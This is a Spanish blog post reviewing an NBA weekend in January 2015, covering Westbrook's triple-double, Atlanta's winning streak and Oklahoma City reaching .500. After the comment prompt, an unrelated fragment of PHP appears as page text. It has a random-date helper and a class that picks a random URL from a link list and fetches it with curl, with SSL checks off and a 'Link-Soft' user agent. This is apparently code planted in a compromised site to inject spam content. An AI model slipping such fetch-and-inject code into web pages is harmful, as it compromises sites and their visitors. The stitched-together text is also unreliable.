Informe del fin de semana: Los Thunder alcanzan el 50%

19 de January de 2015 por TheDeerHunter

Avisábamos el viernes que había que estar atentos al Warriors@Thunder y no quedamos decepcionados.

“El 17-15-17 de Russell Westbrook, es uno de los triples dobles más impresionantes que recuerdo. 5º jugador en los últimos 30 años en conseguir más de 15 puntos, rebotes y asistencias en un mismo partido. Los otros en conseguirlo, son 4 desconocidos..(Magic Johnson, Larry Bird, Jason Kidd y Rajon Rondo)”  Triceratops

El Big Three de los Thunder funcionó como no lo había hecho hasta ahora y además recibió la ayuda de un gran Dion Waiters. Por los Warriors faltaban Andrew Bogut y Ezeli, además de no ser la mejor noche de Stephen Curry. Mientras, en medio de los rumores que le sitúan en Oklahoma City, Brook Lopez brillaba en Washington liderando a los Nets a un convincente triunfo.

Tampoco nos defraudaron unos Hawks imperiales que arrasaron a Toronto para firmar la 11ª victoria consecutiva, ni Derrick Rose que firmó un gran partido que permitió a los Chicago Bulls sumar la victoria en Boston.

Los Grizzlies lo pasaron mal en Orlando, pero comenzaron a rentabilizar el fichaje de Jeff Green en un excelente último cuarto suyo para amarrar el punto y recortar distancias con los Blazers, gracias a su derrota en San Antonio. Los Mavs frenaron a los Nuggets y los Suns sometieron a los Wolves a pesar de otro gran partido de Mo Williams.

Los que  dieron un importante paso atrás, como señalásteis, fueron los Clippers ante unos Cavs sin Kevin Love ni Iman Shumpert. Noche para olvidar de CP3 quien fue destrozado sin piedad por Kyrie Irving en su mejor actuación de lo que va de curso. También tropezaron los Pelicans ante los Sixers, sin Anthony Davis ni Jrue Holiday.  En cambio, los Pistons continuaron su remontada de ensueño en Indianapolis. Un palmeo de Andre Drummond en el último segundo tuvo la culpa. En la anterior posesión había desbaratado el ataque de los Pacers con un flopping descarado. De película.

Para cerrar el viernes Chris Bosh y Luol Deng se combinaron para dar a los Heat la victoria sobre unos Kings que no levantan cabeza y los Jazz ganaron a unos Lakers sin Kobe Bryant, que de momento no jugará ningún back-to-back.

Korver!!! Descanso en Chicago, y si este tío no va al AllStar. es que definitivamente ese evento no sirve para nada.” Nacho

Efectivamente. El sábado los Hawks volvieron a mandar, esta vez en una cancha complicada y contra un equipazo como es Chicago y con Kyle Korver tocado por las musas. El que cada noche destaque en Atlanta un jugador distinto dice mucho de la filosofía del mejor equipo del momento.

El líder de la otra conferencia, los Golden State Warriors, propinó un tremendo correctivo a los Houston Rockets para olvidar la derrota del día anterior. Los Wizards también les devolvieron la afrenta a domicilio del día anterior a los Nets y los Clippers ser resarcieron ante Kings con un gran Blake Griffin que ganó un bonito duelo contra… Jason Thompson (23 puntos y 22 rebotes, nada menos).

Los Grizzlies derrotaron a los Blazers y se sitúan a una sola victoria de la 2ª posición de la conferencia que ahora ocupan los de Oregon. Mini-crisis en Portland que ha perdido sus últimos 3 partidos. En el mano a mano que vienen manteniendo últimamente los Pistons con los Hornets por reengancharse a puestos de playoffs (reíros pero estan a solo una victoria de la 8ª posición de los Nets) hubo tablas ya que los primeros ganaron a los Sixers y los segundos lograron llevarse un horrendo duelo ante Pacers que terminó 81-71 con prórroga incluida.

En cambio los Nuggets vuelven a las andadas y perdieron ante unos Wolves que no ganan a casi nadie. Extraordinario Andrew Wiggins, por cierto.

El domingo partido verpertino entre Pelicans y Raptors:

Pues victoria final de Pelicans, con una canasta ganadora de Tyreke Evans, que hemos intuido más que visto por problemas de señal (creo que del plus, no de allí)
Parece ser que el tercer cuarto de los Raptors fue brillante porque le dieron la vuelta al marcador (tampoco lo vimos), pero el último cuarto de los de Nueva Orleans ha sido muy bueno y han puesto las cosasde su lado. Fredette y Ajinça (ernorme partido el del francés) jugando los minutos calientes.” Nacho

Fue el partido más igualado con diferencia de la jornada porque los otros dos resultaron completamente insulsos. Los Thunder les metieron 79 puntos a los Magic ya en la primera parte, mientras que los Jazz sólo fueron capaces de anotar 69 puntos en todo el partido que les enfrentaba a los Spurs. Con su victoria los de Oklahoma City alcanzan el 50% de victorias-derrotas. ¿Hasta donde podrán escalar?

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>